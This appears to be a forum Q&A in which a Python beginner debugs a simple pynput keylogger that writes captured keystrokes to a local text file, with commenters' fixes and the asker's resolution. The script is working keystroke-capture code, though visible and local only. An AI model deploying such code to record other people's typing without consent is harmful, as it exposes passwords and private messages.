# Keylogger not logging keys to txt file

Tags: python

I recently started coding using Python and I'm trying to create a simple keylogger.

However the keys I pressed do not get logged into the actual txt file.

Heres the code :

```
import pynput 

from pynput.keyboard import Key, Listener 

count = 0 

keys = []

def pressed(key):
    global keys, count

    keys.append(key)
    count += 1
    print("{0} pressed".format(key))
    if count >= 10:
     count = 0
     write_file(keys)    
     keys = [] 

def write_file(keys):
    with open ('Keylogger\log.txt', 'a') as f:
        for key in keys:
            k = str(key).replace("'","")
            if k.find("space") > 0:
             f.write('\n') 
            elif k.find("Key") == -1:
                f.write(k)  




def released(key):
 if key == Key.esc:
  return False

with Listener(on_press=pressed, on_release=released) as listener:
    listener.join()
```

I would greatly appreciate any help!

Comment: Well ... at the time the if condition is tested the list is empty and nothing is logged .......

Comment: move the `if count>10: write_file(keys);keys = []`  into the _pressed(key)_ function

Comment: I did that now but the txt file still registers nothing...

Comment: It works on my macos - do file exists? Maybe it's in another place? Even if `keys` is empty empty file should be created.

Comment: It works now, thank you guys!

For anyone wondering : I deleted the log.txt file I created in the folder, switched out letter "a" in ('Keylogger\log.txt', 'a') to "w" and saw that a log.txt file popped up in the map with the documented keys in.